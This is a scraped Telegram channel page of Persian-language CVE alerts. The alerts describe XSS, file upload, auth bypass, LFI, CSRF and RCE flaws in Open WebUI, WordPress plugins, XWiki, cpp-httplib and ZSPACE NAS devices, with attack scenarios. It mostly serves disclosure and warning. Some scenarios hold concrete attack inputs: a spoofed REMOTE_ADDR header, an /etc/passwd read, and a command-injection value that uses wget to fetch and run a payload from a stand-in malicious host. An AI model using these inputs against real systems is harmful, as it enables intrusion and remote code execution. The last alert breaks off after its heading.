REDTEAM CVE
525 subscribers
1.8K links
سریع‌ترین منبع برای دریافت هشدارهای امنیتی و آسیب‌پذیری‌های جدید (CVE). ما اینترنت را برای شما رصد می‌کنیم
@RedTeamAPT1
@RedTeamAPT_bot
Download Telegram
🚨 New Vulnerability Alert: CVE-2025-65959

🟠 Risk Level: HIGH (Score: 8.7)

تحلیل آسیب‌پذیری Stored XSS در پلتفرم Open WebUI
CVE-2025-65959
---

Vulnerability Description:
یک آسیب‌پذیری از نوع Stored Cross-Site Scripting (XSS) در پلتفرم هوش مصنوعی Open WebUI و در نسخه‌های قبل از 0.6.37 شناسایی شده است.

این ضعف امنیتی در عملکرد دانلود یادداشت‌ها به صورت فایل PDF وجود دارد. مهاجم می‌تواند با بارگذاری یک فایل Markdown که حاوی تگ‌های SVG مخرب است، کدهای جاوا اسکریپت دلخواه را در مرورگر قربانی اجرا کند. آسیب‌پذیری زمانی فعال می‌شود که کاربر قربانی، یادداشت آلوده را به عنوان فایل PDF دانلود می‌کند.

Impact:
مهم‌ترین پیامد این آسیب‌پذیری، سرقت توکن‌های نشست (Session Tokens) کاربران است. این امر به مهاجم اجازه می‌دهد تا نشست کاربر قربانی را ربوده و به حساب کاربری او، اعم از کاربر عادی یا مدیر سیستم، دسترسی کامل پیدا کند.

پس از در اختیار گرفتن حساب کاربری، مهاجم قادر است به اطلاعات خصوصی دسترسی یابد، از طرف کاربر اقدامات مخربی انجام دهد و در صورت دسترسی به حساب مدیر، کنترل کامل پلتفرم را به دست بگیرد.

Scenario:
سناریوی حمله به شرح زیر است:

۱. مهاجم یک فایل Markdown با محتوای مخرب ایجاد می‌کند. این فایل شامل یک تگ SVG است که درون آن کد جاوا اسکریپت برای سرقت توکن‌ها تعبیه شده است.

۲. مهاجم وارد حساب کاربری خود در Open WebUI شده و فایل مخرب را در بخش یادداشت‌ها (Notes) وارد (import) می‌کند.

۳. مهاجم این یادداشت را با یک کاربر دیگر (قربانی) به اشتراک می‌گذارد یا او را ترغیب به مشاهده و دانلود آن می‌کند.

۴. قربانی، پس از ورود به حساب خود، یادداشت آلوده را باز کرده و روی گزینه دانلود به صورت PDF کلیک می‌کند.

۵. در لحظه پردازش برای ایجاد PDF، کد جاوا اسکریپت مخرب در مرورگر قربانی اجرا شده، توکن نشست او را سرقت کرده و به سرور تحت کنترل مهاجم ارسال می‌کند.

۶. مهاجم با استفاده از توکن سرقت شده، به حساب کاربری قربانی وارد شده و کنترل آن را در دست می‌گیرد.

---
توصیه می‌شود کاربران این پلتفرم در اسرع وقت به نسخه 0.6.37 یا بالاتر به‌روزرسانی کنند تا از این خطر در امان بمانند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13066

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری: CVE-2025-13066

---

شرح آسیب‌پذیری:
افزونه Demo Importer Plus برای وردپرس در تمامی نسخه‌های 2.0.6 و پایین‌تر، دارای یک آسیب‌پذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. این ضعف امنیتی به دلیل عدم اعتبارسنجی کافی و صحیح نوع فایل‌های ورودی با پسوند WXR (فرمت استاندارد درون‌ریزی محتوا در وردپرس) به وجود آمده است. مهاجم می‌تواند با ساخت یک فایل با پسوند دوگانه (مانند backdoor.php.xml)، مکانیزم امنیتی افزونه را فریب داده و فایل مخرب خود را با موفقیت بر روی سرور آپلود کند.

تأثیر:
موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور شود. این امر به مهاجم اجازه می‌دهد تا کنترل کامل وب‌سایت را در دست بگیرد، به اطلاعات حساس (مانند اطلاعات کاربران و پایگاه داده) دسترسی پیدا کند، بدافزار یا درهای پشتی (Backdoor) نصب کند و از سرور برای انجام حملات دیگر سوءاستفاده نماید.

سناریوی حمله:
یک مهاجم که حداقل سطح دسترسی نویسنده (Author) را در سایت وردپرسی هدف به دست آورده است، یک فایل شل (Web Shell) مخرب با نامی مانند shell.php.xml ایجاد می‌کند. سپس با استفاده از قابلیت درون‌ریزی در افزونه Demo Importer Plus، این فایل را آپلود می‌کند. افزونه به دلیل ضعف در اعتبارسنجی، پسوند .xml را تشخیص داده و آپلود را مجاز می‌داند، در حالی که وب سرور فایل را به عنوان یک اسکریپت PHP شناسایی و پردازش می‌کند. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را اجرا کرده و کنترل سرور را به دست می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13313

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل حرفه‌ای آسیب‌پذیری با شناسه CVE-2025-13313
افزونه CRM Memberships برای وردپرس

---

شرح آسیب‌پذیری: 📝
آسیب‌پذیری شناسایی شده با کد CVE-2025-13313 در افزونه CRM Memberships برای وردپرس، از نوع افزایش سطح دسترسی (Privilege Escalation) است. این مشکل در تمامی نسخه‌های افزونه تا نسخه 2.5 (و خود این نسخه) وجود دارد.

ضعف اصلی ناشی از نبود کنترل‌های لازم برای احراز هویت و بررسی مجوز دسترسی در تابع ای‌جکس (AJAX) به نام ntzcrm_changepassword است. این نقص به مهاجمان احراز هویت نشده اجازه می‌دهد تا رمز عبور هر کاربری را در وب‌سایت بازنشانی کنند. علاوه بر این، یک نقطه ضعف دیگر در اندپوینت ntzcrm_get_users وجود دارد که به مهاجمان اجازه می‌دهد بدون نیاز به لاگین، لیست ایمیل کاربران سایت را استخراج کرده و فرآیند حمله را تسهیل کنند.

تأثیر: 💥
یک مهاجم بدون نیاز به حساب کاربری، می‌تواند از این آسیب‌پذیری برای بازنشانی رمز عبور هر کاربری، از جمله کاربران با سطح دسترسی مدیر کل (Administrator)، سوءاستفاده کند.

با تغییر رمز عبور یک مدیر، مهاجم می‌تواند کنترل کامل وب‌سایت را به دست آورد. این امر می‌تواند منجر به سرقت اطلاعات حساس کاربران، تغییر محتوای سایت (Defacement)، نصب بدافزار و یا از کار انداختن کامل وب‌سایت شود.

سناریوی حمله: 🎯
یک سناریوی حمله محتمل به شرح زیر است:

۱. مهاجم ابتدا یک درخواست به اندپوینت عمومی و ناامن ntzcrm_get_users ارسال می‌کند. در پاسخ، لیستی از آدرس‌های ایمیل کاربران ثبت‌نام شده در سایت را به دست می‌آورد.

۲. سپس، مهاجم از میان ایمیل‌های به دست آمده، یک حساب کاربری با دسترسی بالا (مانند مدیر) را به عنوان هدف انتخاب می‌کند.

۳. مهاجم درخواستی را به تابع آسیب‌پذیر ntzcrm_changepassword ارسال می‌کند. در این درخواست، ایمیل کاربر هدف و یک رمز عبور جدید (که توسط خود مهاجم تعیین شده) را وارد می‌کند. به دلیل نبود سازوکار امنیتی، سیستم این درخواست غیرمجاز را پذیرفته و رمز عبور کاربر را تغییر می‌دهد.

۴. در نهایت، مهاجم با استفاده از ایمیل کاربر و رمز عبور جدید، با موفقیت به عنوان آن کاربر وارد وب‌سایت شده و کنترل کامل حساب کاربری و وب‌سایت را در اختیار می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12153

🟠 Risk Level: HIGH (Score: 8.8)

📝 شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-12153 در افزونه Featured Image via URL برای وردپرس شناسایی شده است. این آسیب‌پذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) بوده و به دلیل عدم وجود اعتبارسنجی صحیح برای نوع فایل‌های آپلود شده در تمامی نسخه‌ها تا نسخه 0.1 (و خود این نسخه) به وجود آمده است.

💥 میزان تأثیر:

این آسیب‌پذیری به یک مهاجم احرازهویت‌شده (با سطح دسترسی حداقل Contributor) اجازه می‌دهد تا فایل‌های دلخواه، مانند وب‌شل (Web Shell) یا اسکریپت‌های مخرب دیگر، را بر روی سرور سایت آسیب‌پذیر آپلود کند. موفقیت در بهره‌برداری از این ضعف امنیتی می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شده و در نهایت، کنترل کامل وب‌سایت، سرقت اطلاعات حساس و یا استفاده از سرور برای حملات بیشتر را برای مهاجم فراهم آورد.

🎭 سناریوی حمله:

۱. مهاجم با یک حساب کاربری با سطح دسترسی Contributor یا بالاتر وارد سایت وردپرسی هدف می‌شود.

۲. با استفاده از قابلیت آسیب‌پذیر افزونه، مهاجم به جای یک فایل تصویر، یک فایل مخرب با پسوند .php را برای آپلود انتخاب می‌کند.

۳. به دلیل نبود مکانیزم اعتبارسنجی، افزونه فایل مخرب را بدون بررسی نوع آن پذیرفته و بر روی سرور ذخیره می‌کند.

۴. در نهایت، مهاجم با دسترسی مستقیم به URL فایل آپلود شده، کد مخرب خود را بر روی سرور اجرا کرده و می‌تواند کنترل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12181

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-12181

📜 توضیحات آسیب‌پذیری:
آسیب‌پذیری از نوع "آپلود فایل دلخواه" (Arbitrary File Upload) در افزونه ContentStudio برای وردپرس شناسایی شده است. این ضعف امنیتی در تمام نسخه‌های 1.3.7 و پایین‌تر وجود دارد.

منشأ این مشکل، عدم اعتبارسنجی صحیح نوع فایل در تابع cstu_update_post() است. این نقص به مهاجمان احرازهویت‌شده با سطح دسترسی "نویسنده" (Author) یا بالاتر اجازه می‌دهد تا فایل‌هایی با پسوندهای خطرناک (مانند .php) را بر روی سرور سایت هدف آپلود کنند.

💥 تأثیرات:
مهم‌ترین و خطرناک‌ترین پیامد این آسیب‌پذیری، امکان "اجرای کد از راه دور" (Remote Code Execution - RCE) است. با آپلود یک وب‌شل (Web Shell)، مهاجم می‌تواند کنترل کامل سرور را به دست بگیرد.

دیگر تأثیرات بالقوه عبارتند از:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال اسپم)
- از دسترس خارج شدن کامل وب‌سایت

🎭 سناریو حمله:
یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

۱. مهاجم از طریق روش‌هایی مانند فیشینگ یا حدس زدن رمز عبور ضعیف، به یک حساب کاربری با سطح دسترسی "نویسنده" در سایت وردپرسی دسترسی پیدا می‌کند.

۲. مهاجم وارد پیشخوان وردپرس شده و با استفاده از قابلیت‌های افزونه ContentStudio، یک فایل PHP مخرب (مثلاً با نام shell.php) را به جای یک فایل مجاز (مانند تصویر) آپلود می‌کند.

۳. به دلیل عدم وجود مکانیزم بررسی نوع فایل، افزونه این فایل مخرب را پذیرفته و بر روی سرور ذخیره می‌کند.

۴. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده در مرورگر (مثلاً: www.example.com/wp-content/uploads/shell.php)، کد مخرب را اجرا کرده و یک شل دستوری روی سرور به دست می‌آورد و کنترل کامل آن را در اختیار می‌گیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12374

🔴 Risk Level: CRITICAL (Score: 9.8)

✒️ توضیحات آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-12374 از نوع دور زدن احراز هویت (Authentication Bypass) در افزونه User Verification وردپرس شناسایی شده است. این ضعف امنیتی تمامی نسخه‌های افزونه تا نسخه 2.0.39 را تحت تأثیر قرار می‌دهد.

منشأ اصلی این آسیب‌پذیری، عدم اعتبارسنجی صحیح در تابع user_verification_form_wrap_process_otpLogin است. این تابع پیش از مقایسه رمز یک‌بار مصرف (OTP) وارد شده توسط کاربر، بررسی نمی‌کند که آیا اصلاً یک OTP معتبر برای آن کاربر تولید و ارسال شده است یا خیر. این نقص به یک مهاجم غیرمجاز اجازه می‌دهد تا با ارسال یک مقدار OTP خالی، فرآیند تأیید هویت را با موفقیت دور بزند.


💥 تأثیرات و پیامدها:

موفقیت در بهره‌برداری از این آسیب‌پذیری به یک مهاجم احراز هویت نشده اجازه می‌دهد تا به حساب کاربری هر فردی که دارای ایمیل تأیید شده در سیستم است، دسترسی پیدا کند.

خطرناک‌ترین پیامد این حمله، امکان ورود به حساب کاربری با سطح دسترسی مدیر کل (Administrator) است. در این حالت، مهاجم کنترل کامل وب‌سایت را به دست می‌آورد و می‌تواند اقداماتی مخرب مانند سرقت اطلاعات حساس کاربران، نصب بدافزار، تغییر محتوای سایت (Defacement) و یا حذف کامل اطلاعات را انجام دهد.


🎭 سناریوی حمله:

یک سناریوی حمله محتمل به شرح زیر است:

۱. مهاجم یک وب‌سایت را که از نسخه آسیب‌پذیر افزونه استفاده می‌کند، شناسایی می‌کند.

۲. مهاجم ایمیل یا نام کاربری یک کاربر با سطح دسترسی بالا (مثلاً مدیر سایت) را که از قبل می‌داند یا حدس می‌زند، در فرم ورود وارد می‌کند.

۳. در مرحله بعد که سیستم درخواست وارد کردن رمز یک‌بار مصرف (OTP) را دارد، مهاجم فیلد مربوطه را به صورت خالی رها کرده و فرم را ارسال می‌کند.

۴. به دلیل وجود آسیب‌پذیری در منطق برنامه، سیستم این درخواست را به عنوان یک ورود موفقیت‌آمیز پردازش کرده و مهاجم به عنوان کاربر قربانی وارد پنل مدیریت وب‌سایت می‌شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12851

🟠 Risk Level: HIGH (Score: 8.1)

📝 توضیحات آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-12851 از نوع گنجاندن فایل محلی یا Local File Inclusion (LFI) در پلاگین وردپرسی My auctions allegro شناسایی شده است.

این ضعف امنیتی تمامی نسخه‌های این پلاگین تا نسخه 3.6.32 (و خود این نسخه) را تحت تاثیر قرار می‌دهد. مشکل اصلی در پارامتر controller نهفته است که به مهاجمان بدون نیاز به احراز هویت اجازه می‌دهد تا فایل‌های دلخواه موجود بر روی سرور را فراخوانی و محتوای آن‌ها را اجرا کنند.

💥 تاثیرات:

موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به نتایج خطرناکی شود، از جمله:

- اجرای کد از راه دور (RCE): اگر مهاجم بتواند فایلی حاوی کدهای PHP (حتی یک فایل تصویر دستکاری‌شده) را روی سرور آپلود کند، می‌تواند با فراخوانی آن از طریق این آسیب‌پذیری، کنترل کامل وب‌سایت را به دست بگیرد.

- سرقت اطلاعات حساس: مهاجم قادر به خواندن فایل‌های حساس سرور خواهد بود، مانند فایل wp-config.php که حاوی اطلاعات اتصال به پایگاه داده است، یا سایر فایل‌های سیستمی.

- دور زدن کنترل‌های دسترسی: این آسیب‌پذیری می‌تواند برای دور زدن مکانیزم‌های امنیتی و دسترسی به بخش‌های مدیریتی یا محدود شده استفاده شود.

🎭 سناریوی حمله:

یک مهاجم ابتدا یک وب‌سایت را که از نسخه آسیب‌پذیر پلاگین My auctions allegro استفاده می‌کند، شناسایی می‌کند.

در مرحله اول، مهاجم با ارسال یک درخواست دستکاری‌شده به پارامتر controller، سعی می‌کند یک فایل حساس مانند /etc/passwd را بخواند تا اطلاعاتی درباره کاربران سیستم‌عامل سرور به دست آورد.

در یک سناریوی پیشرفته‌تر، مهاجم ابتدا یک فایل به ظاهر بی‌خطر (مانند یک تصویر آواتار) که حاوی کدهای مخرب PHP است را در قسمتی از وب‌سایت آپلود می‌کند. سپس با استفاده از همین آسیب‌پذیری LFI، مسیر آن فایل آپلود شده را در پارامتر controller قرار داده و آن را فراخوانی می‌کند. این عمل باعث اجرای کدهای مخرب PHP و دستیابی به اجرای کد از راه دور (RCE) بر روی سرور هدف می‌شود.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12879

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری: CVE-2025-12879
افزونه وردپرس: User Generator and Importer

---

Vulnerability Description:
آسیب‌پذیری از نوع Cross-Site Request Forgery (CSRF) در افزونه User Generator and Importer برای وردپرس شناسایی شده است. این ضعف امنیتی نسخه‌های 1.2.2 و پایین‌تر را تحت تأثیر قرار می‌دهد. مشکل اصلی ناشی از عدم وجود اعتبارسنجی توکن‌های امنیتی (Nonce) در عملکرد "Import Using CSV File" است.

این نقص به مهاجمان اجازه می‌دهد تا درخواست‌های جعلی را از طرف یک مدیر احراز هویت شده به وب‌سایت ارسال کنند.

Impact:
مهاجم غیر احراز هویت شده می‌تواند با سوءاستفاده از این آسیب‌پذیری، یک حساب کاربری جدید با بالاترین سطح دسترسی (Administrator) بر روی وب‌سایت هدف ایجاد کند. این امر به معنای در اختیار گرفتن کامل کنترل وب‌سایت، دسترسی به تمام اطلاعات کاربران، و امکان اجرای کدهای مخرب بر روی سرور است.

به طور خلاصه، این آسیب‌پذیری می‌تواند منجر به تسخیر کامل وب‌سایت (Full Site Compromise) شود.

Scenario:
یک سناریوی حمله محتمل به شرح زیر است:

۱. مهاجم یک صفحه وب یا لینک مخرب را آماده می‌کند که حاوی یک فرم جعلی برای ارسال درخواست به تابع آسیب‌پذیر در افزونه است. این فرم دستور ایجاد یک کاربر جدید با نام کاربری و رمز عبور دلخواه و سطح دسترسی administrator را در خود جای داده است.

۲. مهاجم با استفاده از روش‌های مهندسی اجتماعی (مانند ارسال ایمیل فیشینگ یا پیام در شبکه‌های اجتماعی)، مدیر وب‌سایت را ترغیب می‌کند تا بر روی لینک مخرب کلیک کند.

۳. زمانی که مدیر (که در همان مرورگر به پنل مدیریت وردپرس خود وارد شده است) روی لینک کلیک می‌کند، مرورگر او به صورت خودکار و پنهانی، درخواست جعلی را به همراه کوکی‌های احراز هویت به وب‌سایت ارسال می‌کند.

۴. از آنجایی که افزونه فاقد مکانیزم دفاعی CSRF (بررسی Nonce) است، درخواست را معتبر تلقی کرده و یک حساب کاربری جدید با دسترسی کامل مدیر برای مهاجم ایجاد می‌کند، بدون اینکه مدیر وب‌سایت متوجه این فرآیند شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65036

🟠 Risk Level: HIGH (Score: 8.3)

شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-65036 در افزونه Remote Macros پلتفرم XWiki شناسایی شده است. این افزونه که برای انتقال محتوا از Confluence به XWiki استفاده می‌شود، دارای یک نقص امنیتی حیاتی است.

نقطه ضعف اصلی در این است که ماکروی مربوطه، کدهای نوشته شده با زبان قالب (Template Language) به نام Velocity را بدون بررسی سطح دسترسی کاربر اجرا می‌کند. این بدان معناست که یک کاربر غیرمجاز می‌تواند با تزریق کد مخرب در صفحات جزئیات (details pages)، آن را بر روی سرور اجرا کند.

نسخه‌های تحت تاثیر: تمامی نسخه‌ها قبل از 1.27.1
نسخه اصلاح شده: 1.27.1

---

تاثیرات:

تاثیر اصلی این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این آسیب‌پذیری به مهاجم اجازه می‌دهد تا دستورات دلخواه خود را بر روی سروری که XWiki روی آن میزبانی می‌شود، اجرا کند.

عواقب احتمالی این حمله عبارتند از:
- کنترل کامل سرور: مهاجم می‌تواند کنترل کامل سرور را در دست بگیرد.
- سرقت اطلاعات حساس: دسترسی به پایگاه داده، فایل‌های پیکربندی و اطلاعات محرمانه کاربران.
- نصب بدافزار: امکان نصب بدافزار، باج‌افزار یا ابزارهای جاسوسی بر روی سرور.
- حملات بعدی: استفاده از سرور قربانی به عنوان پایگاهی برای حمله به سایر سیستم‌ها در شبکه داخلی.

---

سناریوی حمله:

یک مهاجم می‌تواند از این آسیب‌پذیری به شرح زیر بهره‌برداری کند:

۱. ابتدا، مهاجم یک نمونه XWiki را که از نسخه آسیب‌پذیر افزونه Remote Macros استفاده می‌کند، شناسایی می‌کند.

۲. سپس، مهاجم (حتی با یک حساب کاربری با سطح دسترسی پایین یا به عنوان کاربر مهمان در صورت پیکربندی نادرست) یک صفحه جدید ایجاد کرده یا یک صفحه موجود را ویرایش می‌کند.

۳. در این صفحه، مهاجم یک ماکروی آسیب‌پذیر را قرار داده و در پارامترهای آن یا در صفحه جزئیات مرتبط با آن، یک قطعه کد Velocity مخرب تزریق می‌کند. این کد برای اجرای یک دستور سیستمی طراحی شده است. برای مثال، کدی که یک reverse shell به سرور مهاجم برقرار می‌کند.

۴. هنگامی که این صفحه توسط هر کاربری (یا خود مهاجم) مشاهده و رندر می‌شود، ماکروی آسیب‌پذیر بدون هیچ‌گونه بررسی امنیتی، کد Velocity تزریق شده را اجرا می‌کند.

۵. در نتیجه، دستور مخرب بر روی سرور با سطح دسترسی پروسه XWiki اجرا شده و مهاجم به سرور نفوذ می‌کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66570

🔴 Risk Level: CRITICAL (Score: 10.0)

تحلیل آسیب‌پذیری CVE-2025-66570 در کتابخانه cpp-httplib

📝 توصیف آسیب‌پذیری:

یک آسیب‌پذیری از نوع تزریق هدر (Header Injection) در کتابخانه C++ به نام cpp-httplib (نسخه‌های قبل از 0.27.0) شناسایی شده است. مهاجم می‌تواند با ارسال هدرهای HTTP خاصی مانند REMOTE_ADDR، REMOTE_PORT، LOCAL_ADDR و LOCAL_PORT در درخواست خود، اطلاعات متادیتای سرور را دستکاری کند.

این مشکل زمانی رخ می‌دهد که کتابخانه ابتدا هدرهای ارسالی توسط مهاجم را پردازش کرده و سپس بدون حذف مقادیر تکراری، اطلاعات صحیح و داخلی خود را با همین نام‌ها به لیست هدرها اضافه می‌کند. از آنجایی که توابع مربوطه مانند get_header_value اولین مقدار پیدا شده برای یک هدر را برمی‌گردانند، مقدار جعلی تزریق شده توسط مهاجم به جای مقدار واقعی و معتبر سرور مورد استفاده قرار می‌گیرد. این تکنیک به Header Shadowing معروف است.

💥 تأثیرات:

این آسیب‌پذیری می‌تواند منجر به چندین تهدید امنیتی جدی شود:

🔸 جعل آدرس IP (IP Spoofing): مهاجم می‌تواند سرور را فریب دهد تا تصور کند درخواست از یک آدرس IP معتبر یا داخلی (مانند 127.0.0.1) ارسال شده است، در حالی که منبع واقعی درخواست جای دیگری است.

🔸 دور زدن مکانیزم‌های امنیتی (Authorization Bypass): اگر سیستم‌های کنترل دسترسی یا فایروال برنامه کاربردی (WAF) بر اساس آدرس IP کاربر تصمیم‌گیری کنند، مهاجم با جعل یک IP مجاز می‌تواند این محدودیت‌ها را دور بزند.

🔸 مسموم‌سازی لاگ‌ها (Log Poisoning): مهاجم می‌تواند اطلاعات نادرست و گمراه‌کننده را در لاگ‌های سرور ثبت کند. این کار تحلیل امنیتی و ردیابی فعالیت‌های مخرب را بسیار دشوار می‌سازد و ممکن است باعث پنهان ماندن حملات دیگر شود.

🎭 سناریو حمله:

فرض کنید یک وب اپلیکیشن با استفاده از نسخه آسیب‌پذیر cpp-httplib ساخته شده و یک پنل مدیریت دارد که دسترسی به آن فقط برای آدرس IP محلی (127.0.0.1) مجاز است.

1. مهاجم یک درخواست HTTP به سمت سرور ارسال می‌کند.
2. در این درخواست، هدر زیر را به صورت دستی اضافه می‌کند:
REMOTE_ADDR: 127.0.0.1
3. سرور درخواست را دریافت می‌کند. ابتدا هدر جعلی مهاجم را پردازش می‌کند و سپس آدرس IP واقعی مهاجم را (مثلاً 198.51.100.10) با همین نام هدر به لیست اضافه می‌کند.
4. اپلیکیشن برای بررسی دسترسی، آدرس IP کاربر را با تابع get_header_value("REMOTE_ADDR") استعلام می‌کند.
5. این تابع اولین مقدار، یعنی 127.0.0.1 را که توسط مهاجم تزریق شده، برمی‌گرداند.
6. در نتیجه، سیستم کنترل دسترسی تصور می‌کند که درخواست از یک منبع داخلی و معتبر آمده و به مهاجم اجازه ورود به پنل مدیریت را می‌دهد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14106

🟠 Risk Level: HIGH (Score: 8.8)

📜 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع تزریق دستور (Command Injection) با شناسه CVE-2025-14106 در دستگاه‌های ذخیره‌سازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است.

این ضعف امنیتی در تابع zfilev2_api.CloseSafe واقع در مسیر /v2/file/safe/close وجود دارد. مهاجم از راه دور می‌تواند با ارسال یک درخواست HTTP POST و دستکاری پارامتر safe_dir، دستورات دلخواه خود را بر روی سیستم عامل دستگاه اجرا کند. اکسپلویت این آسیب‌پذیری به صورت عمومی منتشر شده و فروشنده محصول هیچ پاسخی جهت رفع آن ارائه نکرده است.


💥 تأثیر:

مهاجمی که از این آسیب‌پذیری بهره‌برداری کند، می‌تواند به طور کامل کنترل دستگاه را در دست بگیرد. این حمله به صورت از راه دور و بدون نیاز به احراز هویت قابل اجرا است.

پیامدهای اصلی عبارتند از:
• اجرای کد از راه دور (RCE) و دسترسی کامل به سیستم.
• سرقت، حذف یا رمزنگاری تمامی داده‌های ذخیره شده بر روی دستگاه.
• نصب بدافزار (مانند باج‌افزار یا تروجان) بر روی دستگاه.
• استفاده از دستگاه به عنوان نقطه‌ای برای نفوذ به سایر سیستم‌های موجود در شبکه داخلی (Pivoting).


🎭 سناریو حمله:

۱. مهاجم یک دستگاه ZSPACE Q2C آسیب‌پذیر را در اینترنت یا شبکه داخلی شناسایی می‌کند.

۲. سپس، یک درخواست HTTP POST دستکاری‌شده به آدرس زیر ارسال می‌کند:
https://[TARGET_IP]/v2/file/safe/close

۳. در بدنه این درخواست، مقدار پارامتر safe_dir با دستورات مخرب سیستم‌عامل ترکیب می‌شود. برای مثال، برای دانلود و اجرای یک اسکریپت مخرب، مهاجم می‌تواند مقداری شبیه به این را ارسال کند:
{"safe_dir": "; wget https://malicious.server/payload -O /tmp/p; chmod +x /tmp/p; /tmp/p"}

۴. وب سرور دستگاه، این ورودی را بدون اعتبارسنجی دریافت کرده و دستورات تزریق شده توسط مهاجم را با سطح دسترسی خود اجرا می‌کند. در نتیجه، مهاجم موفق به اجرای کد از راه دور و به دست گرفتن کنترل دستگاه می‌شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14107

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری | هشدار امنیتی
شناسه: CVE-2025-14107

---

📄 شرح آسیب‌پذیری:

یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاه‌های ذخیره‌سازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است.

این آسیب‌پذیری در تابع zfilev2_api.SafeStatus که از طریق ارسال درخواست HTTP POST به مسیر /v2/file/safe/status قابل دسترس است، وجود دارد. مهاجم می‌تواند با دستکاری پارامتر safe_dir و تزریق دستورات مخرب، کنترل کامل سیستم‌عامل دستگاه را به دست گیرد.

حمله به صورت از راه دور قابل اجرا بوده و کد بهره‌برداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.

💥 سطح تأثیر:

تأثیر این آسیب‌پذیری بسیار بالا (Critical) ارزیابی می‌شود. بهره‌برداری موفقیت‌آمیز می‌تواند منجر به موارد زیر گردد:

- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخش‌های شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.

🎭 سناریوی حمله:

۱. مهاجم با استفاده از ابزارهای اسکن، دستگاه‌های ZSPACE Q2C آسیب‌پذیر که در اینترنت قابل دسترس هستند را شناسایی می‌کند.

۲. سپس یک درخواست HTTP POST دستکاری‌شده به سرور NAS ارسال می‌کند. در این درخواست، پارامتر safe_dir حاوی دستورات مخرب سیستم‌عامل است (برای مثال، دستوری برای دانلود و اجرای یک درب پشتی یا Backdoor).

۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریق‌شده را مستقیماً بر روی سیستم‌عامل اجرا می‌کند.

۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست می‌آورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14108

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14108

توضیحات آسیب‌پذیری:
